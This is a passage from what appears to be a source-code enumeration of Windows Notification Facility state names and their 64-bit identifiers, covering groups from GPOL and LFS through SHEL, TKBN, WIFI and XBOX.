WNF_GLOB_USERPROFILE_LANGLIST_CHANGED = 0x0389022AA3BC0875UL,
WNF_GPOL_SYSTEM_CHANGES = 0x0D891E2AA3BC0875UL,
WNF_GPOL_USER_CHANGES = 0x0D891E2AA3BC10F5UL,
WNF_HAS_VERIFY_HEALTH_CERT = 0x41950F25A3BC0875UL,
WNF_IME_INPUT_MODE_LABEL = 0x41830324A3BC0875UL,
WNF_IMSN_IMMERSIVEMONITORCHANGED = 0x0F950324A3BC1835UL,
WNF_IMSN_KILL_LOGICAL_FOCUS = 0x0F950324A3BC3035UL,
WNF_IMSN_LAUNCHERVISIBILITY = 0x0F950324A3BC1035UL,
WNF_IMSN_MONITORMODECHANGED = 0x0F950324A3BC0835UL,
WNF_IMSN_PROJECTIONDISPLAYAVAILABLE = 0x0F950324A3BC3835UL,
WNF_IOT_EMBEDDED_MODE_POLICY_VALUE_CHANGED = 0x41920124A3BC0875UL,
WNF_IOT_STARTUP_SETTINGS_CHANGED = 0x41920124A3BC10F5UL,
WNF_ISM_LAST_USER_ACTIVITY = 0x418B1D24A3BC0835UL,
WNF_IUIS_SCALE_CHANGED = 0x128F1B24A3BC0835UL,
WNF_KSV_STREAMSTATE = 0x41901D26A3BC0875UL,
WNF_LANG_FOD_INSTALLATION_STARTED = 0x06880F21A3BC0875UL,
WNF_LFS_ACTION_DIALOG_AVAILABLE = 0x41950821A3BC4875UL,
WNF_LFS_CLIENT_RECALCULATE_PERMISSIONS = 0x41950821A3BC3875UL,
WNF_LFS_GEOFENCETRACKING_STATE = 0x41950821A3BC2075UL,
WNF_LFS_MASTERSWITCH_STATE = 0x41950821A3BC1875UL,
WNF_LFS_PERMISSION_TO_SHOW_ICON_CHANGED = 0x41950821A3BC4075UL,
WNF_LFS_POSITION_AVAILABLE = 0x41950821A3BC3075UL,
WNF_LFS_RESERVED_WNF_EVENT_2 = 0x41950821A3BC2875UL,
WNF_LFS_RUNNING_STATE = 0x41950821A3BC1075UL,
WNF_LFS_STATE = 0x41950821A3BC0875UL,
WNF_LIC_DEVICE_LICENSE_MISSING = 0x41850721A3BC3075UL,
WNF_LIC_DEVICE_LICENSE_REMOVED = 0x41850721A3BC2875UL,
WNF_LIC_DEVICE_LICENSE_UPDATED = 0x41850721A3BC2075UL,
WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = 0x41850721A3BC1875UL,
WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_OUT_OF_TOLERANCE = 0x41850721A3BC1075UL,
WNF_LIC_INT_DEVICE_LICENSE_EXPIRED = 0x41850721A3BC3875UL,
WNF_LIC_LOCAL_MIGRATED_LICENSES_FOUND = 0x41850721A3BC4075UL,
WNF_LIC_NO_APPLICABLE_LICENSES_FOUND = 0x41850721A3BC0875UL,
WNF_LM_CONTENT_LICENSE_CHANGED = 0x41C60321A3BC1075UL,
WNF_LM_PACKAGE_SUSPEND_REQUIRED = 0x41C60321A3BC0875UL,
WNF_LM_ROOT_LICENSE_CHANGED = 0x41C60321A3BC1875UL,
WNF_LOC_DEVICE_BROKER_ACCESS_CHANGED = 0x41850121A3BC0875UL,
WNF_LOC_RESERVED_WNF_EVENT = 0x41850121A3BC1075UL,
WNF_LOC_SHOW_SYSTRAY = 0x41850121A3BC1875UL,
WNF_LOGN_EOA_FLYOUT_POSITION = 0x0F810121A3BC0835UL,
WNF_MAPS_MAPLOADER_PACKAGE_CHANGE = 0x12960F20A3BC2075UL,
WNF_MAPS_MAPLOADER_PROGRESS = 0x12960F20A3BC1075UL,
WNF_MAPS_MAPLOADER_STATUS_CHANGE = 0x12960F20A3BC1875UL,
WNF_MM_BAD_MEMORY_PENDING_REMOVAL = 0x41C60320A3BC0875UL,
WNF_MRT_MERGE_SYSTEM_PRI_FILES = 0x41921C20A3BC2075UL,
WNF_MRT_PERSISTENT_QUALIFIER_CHANGED = 0x41921C20A3BC1875UL,
WNF_MRT_QUALIFIER_CONTRAST_CHANGED = 0x41921C20A3BC0875UL,
WNF_MRT_QUALIFIER_THEME_CHANGED = 0x41921C20A3BC1075UL,
WNF_MRT_SYSTEM_PRI_MERGE = 0x41921C20A3BC2875UL,
WNF_MSA_ACCOUNTSTATECHANGE = 0x41871D20A3BC0835UL,
WNF_MUR_MEDIA_UI_REQUEST_LAN = 0x41941B20A3BC1075UL,
WNF_MUR_MEDIA_UI_REQUEST_WLAN = 0x41941B20A3BC0875UL,
WNF_NCB_APP_AVAILABLE = 0x41840D23A3BC0875UL,
WNF_NDIS_ADAPTER_ARRIVAL = 0x128F0A23A3BC0875UL,
WNF_NDIS_CORRUPTED_STORE = 0x128F0A23A3BC1075UL,
WNF_NGC_AIKCERT_TRIGGER = 0x41850923A3BC1075UL,
WNF_NGC_CRYPTO_MDM_POLICY_CHANGED = 0x41850923A3BC3075UL,
WNF_NGC_GESTURE_AUTHENTICATED = 0x41850923A3BC2875UL,
WNF_NGC_PREGEN_DELAY_TRIGGER = 0x41850923A3BC2075UL,
WNF_NGC_PREGEN_TRIGGER = 0x41850923A3BC0875UL,
WNF_NGC_PRO_CSP_POLICY_CHANGED = 0x41850923A3BC1875UL,
WNF_NLA_CAPABILITY_CHANGE = 0x41870223A3BC0875UL,
WNF_NLA_ENTER_SUSPECT_STATE = 0x41870223A3BC1075UL,
WNF_NLA_TASK_TRIGGER = 0x41870223A3BC1875UL,
WNF_NLM_INTERNET_PRESENT = 0x418B0223A3BC1075UL,
WNF_NLM_VPN_RECONNECT_CHANGE = 0x418B0223A3BC0875UL,
WNF_NLS_ACP_CHANGED = 0x41950223A3BC0875UL,
WNF_NLS_GEOID_CHANGED = 0x41950223A3BC3075UL,
WNF_NLS_LANG_UPDATE_LAUNCH = 0x41950223A3BC3875UL,
WNF_NLS_LOCALE_INFO_CHANGED = 0x41950223A3BC2875UL,
WNF_NLS_OEMCP_CHANGED = 0x41950223A3BC1075UL,
WNF_NLS_SETTINGS_REPLICATION_COMPLETE = 0x41950223A3BC4875UL,
WNF_NLS_SETTINGS_REPLICATOR_LAUNCH = 0x41950223A3BC4075UL,
WNF_NLS_USER_DEFAULT_LOCALE_CHANGED = 0x41950223A3BC1875UL,
WNF_NLS_USER_UILANG_CHANGED = 0x41950223A3BC2075UL,
WNF_OOBE_SHL_MAGNIFIER_CONFIRM = 0x04840122A3BC1035UL,
WNF_OOBE_SHL_MAGNIFIER_QUERY = 0x04840122A3BC0835UL,
WNF_OSWN_STORAGE_APP_PAIRING_CHANGE = 0x0F911D22A3BC8075UL,
WNF_OSWN_STORAGE_FINISHED_USAGE_CATEGORY_UPDATE = 0x0F911D22A3BCB875UL,
WNF_OSWN_STORAGE_FREE_SPACE_CHANGE = 0x0F911D22A3BC7075UL,
WNF_OSWN_STORAGE_PRESENCE_CHANGE = 0x0F911D22A3BC6075UL,
WNF_OSWN_STORAGE_SHELLHWD_EVENT = 0x0F911D22A3BCC075UL,
WNF_OSWN_STORAGE_TEMP_CLEANUP_CHANGE = 0x0F911D22A3BC7875UL,
WNF_OSWN_STORAGE_VOLUME_STATUS_CHANGE = 0x0F911D22A3BC6875UL,
WNF_OSWN_SYSTEM_CLOCK_CHANGED = 0x0F911D22A3BC5875UL,
WNF_OVRD_OVERRIDESCALEUPDATED = 0x05941822A3BC0875UL,
WNF_PHN_CALL_STATUS = 0x4188063DA3BC2875UL,
WNF_PHN_CALLFORWARDING_STATUS_LINE0 = 0x4188063DA3BC3075UL,
WNF_PHNL_LINE1_READY = 0x0D88063DA3BC4075UL,
WNF_PHNP_ANNOTATION_ENDPOINT = 0x1188063DA3BC4875UL,
WNF_PHNP_SERVICE_INITIALIZED = 0x1188063DA3BC3875UL,
WNF_PHNP_SIMSEC_READY = 0x1188063DA3BC4075UL,
WNF_PNPA_DEVNODES_CHANGED = 0x0096003DA3BC0875UL,
WNF_PNPA_DEVNODES_CHANGED_SESSION = 0x0096003DA3BC1035UL,
WNF_PNPA_HARDWAREPROFILES_CHANGED = 0x0096003DA3BC2875UL,
WNF_PNPA_HARDWAREPROFILES_CHANGED_SESSION = 0x0096003DA3BC3035UL,
WNF_PNPA_PORTS_CHANGED = 0x0096003DA3BC3875UL,
WNF_PNPA_PORTS_CHANGED_SESSION = 0x0096003DA3BC4035UL,
WNF_PNPA_VOLUMES_CHANGED = 0x0096003DA3BC1875UL,
WNF_PNPA_VOLUMES_CHANGED_SESSION = 0x0096003DA3BC2035UL,
WNF_PNPB_AWAITING_RESPONSE = 0x0396003DA3BC0875UL,
WNF_PNPC_CONTAINER_CONFIG_REQUESTED = 0x0296003DA3BC1875UL,
WNF_PNPC_DEVICE_INSTALL_REQUESTED = 0x0296003DA3BC1075UL,
WNF_PNPC_REBOOT_REQUIRED = 0x0296003DA3BC0875UL,
WNF_PO_CHARGE_ESTIMATE = 0x41C6013DA3BC6075UL,
WNF_PO_COMPOSITE_BATTERY = 0x41C6013DA3BC1075UL,
WNF_PO_DISCHARGE_ESTIMATE = 0x41C6013DA3BC5075UL,
WNF_PO_DISCHARGE_START_FILETIME = 0x41C6013DA3BC5C75UL,
WNF_PO_DISPLAY_REQUEST_ACTIVE = 0x41C6013DA3BC7835UL,
WNF_PO_ENERGY_SAVER_OVERRIDE = 0x41C6013DA3BC3075UL,
WNF_PO_ENERGY_SAVER_SETTING = 0x41C6013DA3BC2875UL,
WNF_PO_ENERGY_SAVER_STATE = 0x41C6013DA3BC2075UL,
WNF_PO_POWER_STATE_CHANGE = 0x41C6013DA3BC1875UL,
WNF_PO_SCENARIO_CHANGE = 0x41C6013DA3BC0875UL,
WNF_PO_THERMAL_HIBERNATE_OCCURRED = 0x41C6013DA3BC4875UL,
WNF_PO_THERMAL_OVERTHROTTLE = 0x41C6013DA3BC6875UL,
WNF_PO_THERMAL_SHUTDOWN_OCCURRED = 0x41C6013DA3BC4075UL,
WNF_PO_THERMAL_STANDBY = 0x41C6013DA3BC3875UL,
WNF_PO_USER_AWAY_PREDICTION = 0x41C6013DA3BC7075UL,
WNF_PROV_TURN_COMPLETE = 0x17891C3DA3BC0875UL,
WNF_PS_WAKE_CHARGE_RESOURCE_POLICY = 0x41C61D3DA3BC0875UL,
WNF_RM_MEMORY_MONITOR_USAGE_LEVEL = 0x41C6033FA3BC0875UL,
WNF_RPCF_FWMAN_RUNNING = 0x07851E3FA3BC0875UL,
WNF_RTDS_NAMED_PIPE_TRIGGER_CHANGED = 0x12821A3FA3BC1875UL,
WNF_RTDS_RPC_INTERFACE_TRIGGER_CHANGED = 0x12821A3FA3BC0875UL,
WNF_SBS_UPDATE_AVAILABLE = 0x41950C3EA3BC0875UL,
WNF_SCM_AUTOSTART_STATE = 0x418B0D3EA3BC0875UL,
WNF_SDO_ORIENTATION_CHANGE = 0x41890A3EA3BC0875UL,
WNF_SEB_AIRPLANE_MODE_DISABLED_FOR_EMERGENCY_CALL = 0x41840B3EA3BD7075UL,
WNF_SEB_APP_LAUNCH_PREFETCH = 0x41840B3EA3BD1075UL,
WNF_SEB_APP_RESUME = 0x41840B3EA3BD2075UL,
WNF_SEB_BACKGROUND_WORK_COST_CHANGE = 0x41840B3EA3BC8875UL,
WNF_SEB_BACKGROUND_WORK_COST_HIGH = 0x41840B3EA3BC9075UL,
WNF_SEB_BATTERY_LEVEL = 0x41840B3EA3BC5075UL,
WNF_SEB_BOOT = 0x41840B3EA3BC6075UL,
WNF_SEB_CACHED_FILE_UPDATED = 0x41840B3EA3BCC875UL,
WNF_SEB_CALL_HISTORY_CHANGED = 0x41840B3EA3BD6075UL,
WNF_SEB_CALL_STATE_CHANGED = 0x41840B3EA3BD5075UL,
WNF_SEB_DEPRECATED1 = 0x41840B3EA3BD1875UL,
WNF_SEB_DEPRECATED2 = 0x41840B3EA3BD2875UL,
WNF_SEB_DEPRECATED3 = 0x41840B3EA3BD3075UL,
WNF_SEB_DEPRECATED4 = 0x41840B3EA3BD3875UL,
WNF_SEB_DEPRECATED5 = 0x41840B3EA3BD4075UL,
WNF_SEB_DEPRECATED6 = 0x41840B3EA3BD4875UL,
WNF_SEB_DEV_MNF_CUSTOM_NOTIFICATION_RECEIVED = 0x41840B3EA3BCB875UL,
WNF_SEB_DOMAIN_JOINED = 0x41840B3EA3BC5875UL,
WNF_SEB_FREE_NETWORK_PRESENT = 0x41840B3EA3BC1075UL,
WNF_SEB_FULL_SCREEN_VIDEO_PLAYBACK = 0x41840B3EA3BD0075UL,
WNF_SEB_GEOLOCATION = 0x41840B3EA3BCB075UL,
WNF_SEB_INTERNET_PRESENT = 0x41840B3EA3BC0875UL,
WNF_SEB_IP_ADDRESS_AVAILABLE = 0x41840B3EA3BC8075UL,
WNF_SEB_LINE_CHANGED = 0x41840B3EA3BD6875UL,
WNF_SEB_LOW_LATENCY_POWER_REQUEST = 0x41840B3EA3BCF075UL,
WNF_SEB_MBAE_NOTIFICATION_RECEIVED = 0x41840B3EA3BC2875UL,
WNF_SEB_MOB_OPERATOR_CUSTOM_NOTIFICATION_RECEIVED = 0x41840B3EA3BCC075UL,
WNF_SEB_MOBILE_BROADBAND_DEVICE_SERVICE_NOTIFICATION = 0x41840B3EA3BD9075UL,
WNF_SEB_MOBILE_BROADBAND_PIN_LOCK_STATE_CHANGE = 0x41840B3EA3BD8875UL,
WNF_SEB_MOBILE_BROADBAND_RADIO_STATE_CHANGE = 0x41840B3EA3BD8075UL,
WNF_SEB_MOBILE_BROADBAND_REGISTRATION_STATE_CHANGE = 0x41840B3EA3BD7875UL,
WNF_SEB_MONITOR_ON = 0x41840B3EA3BC7875UL,
WNF_SEB_NETWORK_CONTROL_CHANNEL_TRIGGER_RESET = 0x41840B3EA3BC3075UL,
WNF_SEB_NETWORK_STATE_CHANGES = 0x41840B3EA3BC2075UL,
WNF_SEB_NFC_PERF_BOOST = 0x41840B3EA3BD0875UL,
WNF_SEB_NON_OFFLOADED_AUDIO = 0x41840B3EA3BCE875UL,
WNF_SEB_OFFLOADED_AUDIO = 0x41840B3EA3BCE075UL,
WNF_SEB_ONLINE_ID_CONNECTED_STATE_CHANGE = 0x41840B3EA3BC4075UL,
WNF_SEB_RESILIENCY_NOTIFICATION_PHASE = 0x41840B3EA3BCF875UL,
WNF_SEB_SMART_CARD_FIELD_INFO_NOTIFICATION = 0x41840B3EA3BCD075UL,
WNF_SEB_SMART_CARD_HCE_APPLICATION_ACTIVATION_NOTIFICATION = 0x41840B3EA3BCD875UL,
WNF_SEB_SMART_CARD_TRANSACTION_NOTIFICATION = 0x41840B3EA3BCA075UL,
WNF_SEB_SMS_RECEIVED = 0x41840B3EA3BC1875UL,
WNF_SEB_SYSTEM_AC = 0x41840B3EA3BC7075UL,
WNF_SEB_SYSTEM_IDLE = 0x41840B3EA3BC4875UL,
WNF_SEB_SYSTEM_LPE = 0x41840B3EA3BC9875UL,
WNF_SEB_SYSTEM_MAINTENANCE = 0x41840B3EA3BCA875UL,
WNF_SEB_TIME_ZONE_CHANGE = 0x41840B3EA3BC3875UL,
WNF_SEB_USER_PRESENT = 0x41840B3EA3BC6875UL,
WNF_SEB_VOICEMAIL_CHANGED = 0x41840B3EA3BD5875UL,
WNF_SHEL_APPLICATION_STATE_UPDATE = 0x0D83063EA3BC7075UL,
WNF_SHEL_APPRESOLVER_SCAN = 0x0D83063EA3BC5075UL,
WNF_SHEL_CORTANA_APPINDEX_UPDATED = 0x0D83063EA3BC9875UL,
WNF_SHEL_CREATIVE_EVENT_TRIGGERED = 0x0D83063EA3BCD875UL,
WNF_SHEL_DEVICE_UNLOCKED = 0x0D83063EA3BCC075UL,
WNF_SHEL_ENTERPRISE_START_LAYOUT_POLICY_VALUE_CHANGED = 0x0D83063EA3BC9075UL,
WNF_SHEL_FOCUS_CHANGE = 0x0D83063EA3BC7875UL,
WNF_SHEL_GAMECONTROLLER_FOCUS_INFO = 0x0D83063EA3BC8875UL,
WNF_SHEL_GAMECONTROLLER_LISTENER_INFO = 0x0D83063EA3BC8075UL,
WNF_SHEL_GAMECONTROLLER_NEXUS_INFO = 0x0D83063EA3BCF075UL,
WNF_SHEL_IMMERSIVE_SHELL_RUNNING = 0x0D83063EA3BC0875UL,
WNF_SHEL_JUMPLIST_CHANGED = 0x0D83063EA3BCE075UL,
WNF_SHEL_LOCKSCREEN_ACTIVE = 0x0D83063EA3BC5835UL,
WNF_SHEL_LOGON_COMPLETE = 0x0D83063EA3BC1875UL,
WNF_SHEL_NOTIFICATION_SETTINGS_CHANGED = 0x0D83063EA3BC3835UL,
WNF_SHEL_NOTIFICATIONS = 0x0D83063EA3BC1035UL,
WNF_SHEL_NOTIFICATIONS_CRITICAL = 0x0D83063EA3BCA835UL,
WNF_SHEL_OOBE_USER_LOGON_COMPLETE = 0x0D83063EA3BC2475UL,
WNF_SHEL_PLACES_CHANGED = 0x0D83063EA3BCC875UL,
WNF_SHEL_SETTINGS_CHANGED = 0x0D83063EA3BCF875UL,
WNF_SHEL_SOFTLANDING_PUBLISHED = 0x0D83063EA3BD0835UL,
WNF_SHEL_SOFTLANDING_RULE_TRIGGERED = 0x0D83063EA3BC4075UL,
WNF_SHEL_SOFTLANDING_RULES_UPDATED = 0x0D83063EA3BCA075UL,
WNF_SHEL_START_APPLIFECYCLE_DOWNLOAD_STARTED = 0x0D83063EA3BC6875UL,
WNF_SHEL_START_APPLIFECYCLE_INSTALL_FINISHED = 0x0D83063EA3BC6075UL,
WNF_SHEL_START_APPLIFECYCLE_UNINSTALL_FINISHED = 0x0D83063EA3BCE875UL,
WNF_SHEL_START_LAYOUT_READY = 0x0D83063EA3BC4875UL,
WNF_SHEL_START_VISIBILITY_CHANGED = 0x0D83063EA3BCB075UL,
WNF_SHEL_SUSPEND_APP_BACKGROUND_ACTIVITY = 0x0D83063EA3BCD075UL,
WNF_SHEL_TILECHANGE = 0x0D83063EA3BC3075UL,
WNF_SHEL_TOAST_PUBLISHED = 0x0D83063EA3BD0035UL,
WNF_SHEL_TRAY_SEARCHBOX_VISIBILITY_CHANGED = 0x0D83063EA3BCB875UL,
WNF_SHEL_USER_SETTINGS_CONTENT_READY = 0x0D83063EA3BD1075UL,
WNF_SHEL_VEEVENT_DISPATCHER_CLIENT_PIPE_CLOSED = 0x0D83063EA3BC2875UL,
WNF_SHR_DHCP_IPv4_LEASE_LIST = 0x4194063EA3BC1075UL,
WNF_SHR_SHARING_CHANGED = 0x4194063EA3BC0835UL,
WNF_SIO_PIN_ENROLLED = 0x4189073EA3BC0875UL,
WNF_SKYD_FILE_SYNC = 0x059F053EA3BC0875UL,
WNF_SKYD_QUOTA_CHANGE = 0x059F053EA3BC1075UL,
WNF_SMS_CHECK_ACCESS = 0x4195033EA3BC0875UL,
WNF_SMSR_NEW_MESSAGE_RECEIVED = 0x1395033EA3BC1875UL,
WNF_SMSR_READY = 0x1395033EA3BC0875UL,
WNF_SMSR_WWAN_READ_DONE = 0x1395033EA3BC1075UL,
WNF_SMSS_MEMORY_COOLING_COMPATIBLE = 0x1295033EA3BC0875UL,
WNF_SPAC_SPACEPORT_COMPREHENSIVE_WNF_STATE = 0x02871E3EA3BC0875UL,
WNF_SPAC_SPACEPORT_REPAIR_REQUESTED = 0x02871E3EA3BC1075UL,
WNF_SPCH_INPUT_STATE_UPDATE = 0x09851E3EA3BC0835UL,
WNF_SPI_LOGICALDPIOVERRIDE = 0x418F1E3EA3BC0835UL,
WNF_SRC_SYSTEM_RADIO_CHANGED = 0x41851C3EA3BC0875UL,
WNF_SRT_WINRE_CONFIGURATION_CHANGE = 0x41921C3EA3BC0875UL,
WNF_STOR_CONFIGURATION_DEVICE_INFO_UPDATED = 0x13891A3EA3BC0875UL,
WNF_STOR_CONFIGURATION_MO_TASK_RUNNING = 0x13891A3EA3BC1075UL,
WNF_STOR_CONFIGURATION_OEM_TASK_RUNNING = 0x13891A3EA3BC1875UL,
WNF_SUPP_ENABLE_ERROR_DETAILS_CACHE = 0x11961B3EA3BC0875UL,
WNF_SYNC_REQUEST_PROBE = 0x0288173EA3BC0875UL,
WNF_TB_SYSTEM_TIME_CHANGED = 0x41C60C39A3BC0875UL,
WNF_TEAM_SHELL_HOTKEY_PRESSED = 0x0C870B39A3BC0875UL,
WNF_TETH_TETHERING_STATE = 0x09920B39A3BC0875UL,
WNF_THME_THEME_CHANGED = 0x048B0639A3BC0875UL,
WNF_TKBN_AUTOCOMPLETE = 0x0F840539A3BC4835UL,
WNF_TKBN_CANDIDATE_WINDOW_STATE = 0x0F840539A3BC7835UL,
WNF_TKBN_CARET_TRACKING = 0x0F840539A3BC4035UL,
WNF_TKBN_COMPOSITION_STATE = 0x0F840539A3BC9035UL,
WNF_TKBN_DESKTOP_MODE_AUTO_IHM = 0x0F840539A3BCB035UL,
WNF_TKBN_FOREGROUND_WINDOW = 0x0F840539A3BC3835UL,
WNF_TKBN_IMMERSIVE_FOCUS_TRACKING = 0x0F840539A3BC1835UL,
WNF_TKBN_INPUT_PANE_DISPLAY_POLICY = 0x0F840539A3BCA835UL,
WNF_TKBN_KEYBOARD_GESTURE = 0x0F840539A3BC6835UL,
WNF_TKBN_KEYBOARD_LAYOUT_CHANGE = 0x0F840539A3BC8035UL,
WNF_TKBN_KEYBOARD_VIEW_CHANGE = 0x0F840539A3BC5835UL,
WNF_TKBN_KEYBOARD_VISIBILITY = 0x0F840539A3BC0835UL,
WNF_TKBN_LANGUAGE = 0x0F840539A3BC3035UL,
WNF_TKBN_MODERN_KEYBOARD_FOCUS_TRACKING = 0x0F840539A3BC5035UL,
WNF_TKBN_RESTRICTED_KEYBOARD_GESTURE = 0x0F840539A3BC7035UL,
WNF_TKBN_RESTRICTED_KEYBOARD_LAYOUT_CHANGE = 0x0F840539A3BC8835UL,
WNF_TKBN_RESTRICTED_KEYBOARD_VIEW_CHANGE = 0x0F840539A3BC6035UL,
WNF_TKBN_RESTRICTED_KEYBOARD_VISIBILITY = 0x0F840539A3BC1035UL,
WNF_TKBN_RESTRICTED_TOUCH_EVENT = 0x0F840539A3BC2835UL,
WNF_TKBN_SYSTEM_IMMERSIVE_FOCUS_TRACKING = 0x0F840539A3BC9835UL,
WNF_TKBN_SYSTEM_TOUCH_EVENT = 0x0F840539A3BCA035UL,
WNF_TKBN_TOUCH_EVENT = 0x0F840539A3BC2035UL,
WNF_TKBR_CHANGE_APP = 0x13840539A3BC1075UL,
WNF_TKBR_CHANGE_SYSTEM = 0x13840539A3BC08F5UL,
WNF_TMCN_ISTABLETMODE = 0x0F850339A3BC0875UL,
WNF_TOPE_INP_POINTER_DEVICE_ACTIVITY = 0x04960139A3BC0875UL,
WNF_TPM_DEVICEID_STATE = 0x418B1E39A3BC1075UL,
WNF_TPM_OWNERSHIP_TAKEN = 0x418B1E39A3BC0875UL,
WNF_TPM_PROVISION_TRIGGER = 0x418B1E39A3BC1875UL,
WNF_TZ_LEGACY_STORE_CHANGED = 0x41C61439A3BC0875UL,
WNF_TZ_STORE_CHANGED = 0x41C61439A3BC1075UL,
WNF_TZ_TIMEZONE_CHANGED = 0x41C61439A3BC1875UL,
WNF_UBPM_CONSOLE_MONITOR = 0x0C960C38A3BC1075UL,
WNF_UBPM_FRMU_ALLOWED = 0x0C960C38A3BC1875UL,
WNF_UBPM_POWER_SOURCE = 0x0C960C38A3BC0875UL,
WNF_UBPM_PRESHUTDOWN_PHASE = 0x0C960C38A3BC2075UL,
WNF_UDA_CONTACT_SORT_CHANGED = 0x41870A38A3BC2835UL,
WNF_UDM_SERVICE_INITIALIZED = 0x418B0A38A3BC0835UL,
WNF_UMDF_WUDFSVC_START = 0x07820338A3BC0875UL,
WNF_UMGR_SESSIONUSER_TOKEN_CHANGE = 0x13810338A3BC2875UL,
WNF_UMGR_SIHOST_READY = 0x13810338A3BC0835UL,
WNF_UMGR_SYSTEM_USER_CONTEXT_CHANGED = 0x13810338A3BC2075UL,
WNF_UMGR_USER_LOGIN = 0x13810338A3BC1075UL,
WNF_UMGR_USER_LOGOUT = 0x13810338A3BC1875UL,
WNF_USB_BILLBOARD_CHANGE = 0x41841D38A3BC1075UL,
WNF_USB_CHARGING_STATE = 0x41841D38A3BC2075UL,
WNF_USB_FUNCTION_CONTROLLER_STATE = 0x41841D38A3BC2875UL,
WNF_USB_PEER_DEVICE_STATE = 0x41841D38A3BC1875UL,
WNF_USB_TYPE_C_PARTNER_STATE = 0x41841D38A3BC0875UL,
WNF_USO_ACTIVE_SESSION = 0x41891D38A3BC2875UL,
WNF_USO_REBOOT_REQUIRED = 0x41891D38A3BC2075UL,
WNF_USO_STATE_ATTENTION_REQUIRED = 0x41891D38A3BC1075UL,
WNF_USO_STATE_CHANGE = 0x41891D38A3BC0875UL,
WNF_USO_UPDATE_PROGRESS = 0x41891D38A3BC1875UL,
WNF_USO_UPDATE_SUCCEEDED = 0x41891D38A3BC3075UL,
WNF_UTS_LOCKSCREEN_DISMISSAL_TRIGGERED = 0x41951A38A3BC1475UL,
WNF_UTS_USERS_ENROLLED = 0x41951A38A3BC0C75UL,
WNF_VAN_VANUI_STATUS = 0x41880F3BA3BC0875UL,
WNF_WCM_INTERFACE_LIST = 0x418B0D3AA3BC0875UL,
WNF_WCM_MAPPING_POLICY_UPDATED = 0x418B0D3AA3BC1875UL,
WNF_WCM_PROFILE_CONFIG_UPDATED = 0x418B0D3AA3BC2075UL,
WNF_WCM_SERVICE_STATUS = 0x418B0D3AA3BC1075UL,
WNF_WER_QUEUED_REPORTS = 0x41940B3AA3BC1075UL,
WNF_WER_SERVICE_START = 0x41940B3AA3BC0875UL,
WNF_WFAS_FIREWALL_NETWORK_CHANGE_READY = 0x1287083AA3BC0875UL,
WNF_WFS_SETTINGS = 0x4195083AA3BC0875UL,
WNF_WHTP_WINHTTP_PROXY_AUTHENTICATION_REQUIRED = 0x1192063AA3BC1075UL,
WNF_WHTP_WINHTTP_PROXY_DISCOVERED = 0x1192063AA3BC0875UL,
WNF_WIFI_AOAC_STATUS = 0x0880073AA3BC4875UL,
WNF_WIFI_AVERAGE_TRANSMIT = 0x0880073AA3BC6875UL,
WNF_WIFI_CONNECTION_SCORE = 0x0880073AA3BC5875UL,
WNF_WIFI_CONNECTION_STATUS = 0x0880073AA3BC0875UL,
WNF_WIFI_CPL_STATUS = 0x0880073AA3BC1075UL,
WNF_WIFI_HOTSPOT_HOST_READY = 0x0880073AA3BC2875UL,
WNF_WIFI_L3_AUTH_STATE = 0x0880073AA3BC8075UL,
WNF_WIFI_MEDIA_STREAMING_MODE = 0x0880073AA3BC7075UL,
WNF_WIFI_SERVICE_NOTIFICATIONS = 0x0880073AA3BC2075UL,
WNF_WIFI_TASK_TRIGGER = 0x0880073AA3BC7875UL,
WNF_WIFI_TILE_UPDATE = 0x0880073AA3BC6075UL,
WNF_WIFI_WLANSVC_NOTIFICATION = 0x0880073AA3BC8875UL,
WNF_WIL_BOOT_FEATURE_STORE = 0x418A073AA3BC1475UL,
WNF_WIL_FEATURE_STORE = 0x418A073AA3BC0C75UL,
WNF_WLRS_COLLECTIONINTEREST = 0x1294023AA3BC1875UL,
WNF_WLRS_SETTINGS = 0x1294023AA3BC0875UL,
WNF_WLRS_USERTILE = 0x1294023AA3BC1075UL,
WNF_WNS_CONNECTIVITY_STATUS = 0x4195003AA3BC0875UL,
WNF_WOF_OVERLAY_CONFIGURATION_CHANGE = 0x4180013AA3BC0875UL,
WNF_WSC_SECURITY_CENTER_USER_NOTIFICATION = 0x41851D3AA3BC0875UL,
WNF_WSQM_IS_OPTED_IN = 0x0C971D3AA3BC0875UL,
WNF_WUA_AU_SCAN_COMPLETE = 0x41871B3AA3BC1075UL,
WNF_WUA_CALL_HANG = 0x41871B3AA3BC1875UL,
WNF_WUA_NUM_PER_USER_UPDATES = 0x41871B3AA3BC08F5UL,
WNF_WUA_SERVICE_HANG = 0x41871B3AA3BC2075UL,
WNF_WUA_STAGEUPDATE_DETAILS = 0x41871B3AA3BC2875UL,
WNF_WWAN_OBJECT_LIST = 0x0F87193AA3BC0875UL,
WNF_XBOX_ACCESSIBILITY_NARRATOR_ENABLED = 0x19890C35A3BDF075UL,
WNF_XBOX_ACHIEVEMENTS_RAW_NOTIFICATION_RECEIVED = 0x19890C35A3BC8075UL,
WNF_XBOX_ACTIVE_APPLICATION_CHANGED = 0x19890C35A3BC1875UL,
WNF_XBOX_APP_BAND_FOCUS_TOGGLED = 0x19890C35A3BCA875UL,
WNF_XBOX_APPLICATION_COM_RESILIENCY_STATUS_CHANGED = 0x19890C35A3BCD875UL,
WNF_XBOX_APPLICATION_CONTEXT_CHANGED = 0x19890C35A3BC0875UL,
WNF_XBOX_APPLICATION_CURRENT_USER_CHANGED = 0x19890C35A3BE0075UL,
WNF_XBOX_APPLICATION_ERROR = 0x19890C35A3BC6075UL,
WNF_XBOX_APPLICATION_FOCUS_CHANGED = 0x19890C35A3BC1075UL,
WNF_XBOX_APPLICATION_LAYOUT_CHANGED = 0x19890C35A3BC9075UL,
WNF_XBOX_APPLICATION_LICENSE_CHANGED = 0x19890C35A3BD0075UL,
WNF_XBOX_APPLICATION_NO_LONGER_RUNNING = 0x19890C35A3BC5075UL,
WNF_XBOX_AUTO_SIGNIN_IN_PROGRESS = 0x19890C35A3BDE075UL,
WNF_XBOX_AUTOPLAY_CONTENT_DETECTED = 0x19890C35A3BC5875UL,
WNF_XBOX_CORTANA_SIGNEDIN_USERS_GRAMMAR_UPDATE_NOTIFICATION = 0x19890C35A3BE2075UL,
WNF_XBOX_CORTANA_TV_GRAMMAR_UPDATE_NOTIFICATION = 0x19890C35A3BE1875UL,
WNF_XBOX_CORTANAOVERLAY_VISIBILITY_CHANGED = 0x19890C35A3BDC875UL,
WNF_XBOX_ERA_TITLE_LAUNCH_NOTIFICATION = 0x19890C35A3BD5875UL,
